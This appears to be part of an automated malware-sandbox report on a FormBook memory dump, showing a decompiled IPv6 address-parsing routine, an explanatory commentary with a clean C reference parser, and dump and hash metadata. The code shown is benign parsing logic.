                                                				if(_v12 != 0) {
                                                					if(_v12 != 3) {
                                                						goto L29;
                                                					}
                                                					_v8 = _v8 + 1;
                                                				}
                                                				if(_v28 != 0 || _v8 == 7) {
                                                					if(_v20 != 1) {
                                                						if(_v20 != 2) {
                                                							goto L29;
                                                						}
                                                						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                						L65:
                                                						_t105 = _v28;
                                                						if(_t105 != 0) {
                                                							_t98 = (_t105 - _v8) * 2; // 0x11
                                                							E02528980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                							_t110 = 8;
                                                							E0251DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                						}
                                                						return 0;
                                                					}
                                                					if(_v12 != 0) {
                                                						if(_v16 > 3) {
                                                							goto L29;
                                                						}
                                                						_t114 = E0254EE02(_v24, 0, 0xa);
                                                						_t170 = _t170 + 0xc;
                                                						if(_t114 > 0xff) {
                                                							goto L29;
                                                						}
                                                						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                						goto L65;
                                                					}
                                                					if(_v16 > 4) {
                                                						goto L29;
                                                					}
                                                					_t115 = E0254EE02(_v24, 0, 0x10);
                                                					_t170 = _t170 + 0xc;
                                                					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                					goto L65;
                                                				} else {
                                                					goto L29;
                                                				}
                                                			}
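The checks visible in the fragment above are consistent with a text-to-binary IPv6 address parser: 0x3a (':') and 0x2e ('.') are the only accepted separators, a second "::" (tracked in `_v28`) or an eighth ':' (`_v8 > 6`) aborts, a dotted tail must contain exactly three dots (`_v12 != 3`) with base-10 octets no larger than 0xff (the `E0254EE02(..., 0xa)` call and `_t114 > 0xff` test), other groups are converted with base 0x10, the class masks 4 and 0x80 passed to `E0254685D` match the MSVC ctype values `_DIGIT` and `_HEX`, and the `E02528980`/`E0251DFC0` pair at L65 moves the groups after "::" to the end and zero-fills the gap. That identification is an inference from this listing, not something the report states. The following is a clean reference implementation of those rules, added here as an illustration; it is not the sample's code, and the function names `parse_ipv6`, `ipv6_is_valid` and `ipv6_parses_to` are chosen for this example.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Illustrative IPv6 text parser (not the sample's code). Rules enforced:
 * groups of 1-4 hex digits separated by ':'; "::" at most once, expanding to
 * the zero groups needed to reach 8; an optional trailing dotted quad (exactly
 * 3 dots, octets of 1-3 decimal digits <= 255) in place of the last 2 groups. */

/* Read 1-4 hex digits at *pp into *val; reject an empty or over-long group. */
static int parse_hex_group(const char **pp, unsigned *val)
{
    const char *p = *pp;
    unsigned v = 0;
    int n = 0;
    while (n < 4 && isxdigit((unsigned char)*p)) {
        int c = tolower((unsigned char)*p++);
        v = v * 16 + (unsigned)(isdigit(c) ? c - '0' : c - 'a' + 10);
        n++;
    }
    if (n == 0 || isxdigit((unsigned char)*p)) return 0;
    *pp = p;
    *val = v;
    return 1;
}

/* Parse "a.b.c.d" at p, which must run to the end of the string. */
static int parse_ipv4_tail(const char *p, uint8_t v4[4])
{
    for (int i = 0; i < 4; i++) {
        unsigned v = 0;
        int n = 0;
        while (n < 3 && isdigit((unsigned char)*p)) {
            v = v * 10 + (unsigned)(*p++ - '0');
            n++;
        }
        if (n == 0 || v > 255) return 0;
        v4[i] = (uint8_t)v;
        if (i < 3 && *p++ != '.') return 0;
    }
    return *p == '\0';
}

/* Returns 1 and fills out[16] (network byte order) on success, 0 otherwise. */
int parse_ipv6(const char *s, uint8_t out[16])
{
    uint16_t groups[8] = {0};
    int n = 0;       /* groups parsed so far */
    int dc = -1;     /* group index where "::" appeared, -1 if absent */
    const char *p = s;
    unsigned v;
    uint8_t v4[4];

    if (*p == ':') {                       /* a leading ':' is only valid as "::" */
        if (p[1] != ':') return 0;
        dc = 0;
        p += 2;
    }
    while (*p != '\0') {
        const char *q = p;                 /* look ahead for a dotted quad */
        while (isxdigit((unsigned char)*q)) q++;
        if (*q == '.') {                   /* must fit in the last two groups */
            if (n > 6 || !parse_ipv4_tail(p, v4)) return 0;
            groups[n++] = (uint16_t)((v4[0] << 8) | v4[1]);
            groups[n++] = (uint16_t)((v4[2] << 8) | v4[3]);
            break;
        }
        if (n > 7 || !parse_hex_group(&p, &v)) return 0;
        groups[n++] = (uint16_t)v;
        if (*p == '\0') break;
        if (*p++ != ':') return 0;
        if (*p == ':') {                   /* "::" may occur at most once */
            if (dc >= 0) return 0;
            dc = n;
            p++;
        } else if (*p == '\0') {
            return 0;                      /* trailing single ':' */
        }
    }
    if (dc < 0) {
        if (n != 8) return 0;
    } else {
        int tail = n - dc;
        if (n > 7) return 0;               /* "::" stands for at least one group */
        /* Slide the groups after "::" to the end and zero the gap (the memmove/memset step). */
        if (tail > 0)
            memmove(&groups[8 - tail], &groups[dc], (size_t)tail * sizeof groups[0]);
        memset(&groups[dc], 0, (size_t)(8 - n) * sizeof groups[0]);
    }
    for (int i = 0; i < 8; i++) {
        out[2 * i] = (uint8_t)(groups[i] >> 8);
        out[2 * i + 1] = (uint8_t)(groups[i] & 0xff);
    }
    return 1;
}

/* Result helpers: validity check, and comparison with a 32-character hex string. */
int ipv6_is_valid(const char *s)
{
    uint8_t b[16];
    return parse_ipv6(s, b);
}

int ipv6_parses_to(const char *s, const char *hex32)
{
    uint8_t b[16];
    char got[33];
    if (!parse_ipv6(s, b)) return 0;
    for (int i = 0; i < 16; i++) sprintf(got + 2 * i, "%02x", b[i]);
    return strcmp(got, hex32) == 0;
}
```

Calling `parse_ipv6("::ffff:192.0.2.1", buf)` yields the IPv4-mapped address `0000:0000:0000:0000:0000:ffff:c000:0201`; inputs such as `1::2::3`, `12345::` or `::1:` are rejected, which is the behaviour the fragment's `break` paths (a second "::", a group longer than four digits, a dangling separator) appear to implement. For an analyst the practical use is triage: a routine with this shape in an unpacked FormBook image is a self-contained address parser, which is worth knowing before spending time on it as if it were payload logic.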
Instruction address column (the instruction text that accompanies it in the interactive view is not present on the page). The listing starts at 0x0254fcd1 and covers four non-contiguous code ranges: 0x0254fcd1-0x0254fe2f, 0x0255a3a1-0x0255a3b3, 0x02561fe7-0x02562018 and 0x0257ec67-0x0257edcc; the 0x00000000 entries in the column carry no address.

APIs
Memory Dump Source
• Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
• Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
• Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
• Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
• Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
Similarity
• API ID: __fassign
• String ID:
• API String ID: 3965848254-0
• Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction ID: 4a259fc3b6d0d9fc7a15e12d1f3c35a3bf2cbeebf3b713414195a6942ea409ea
• Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction Fuzzy Hash: 3F918B31D0021AEFDF25CF99C8457AEFBB8FB8531DF20846AD405A6691EB304A51CB99
Uniqueness
• Uniqueness Score: -1.00%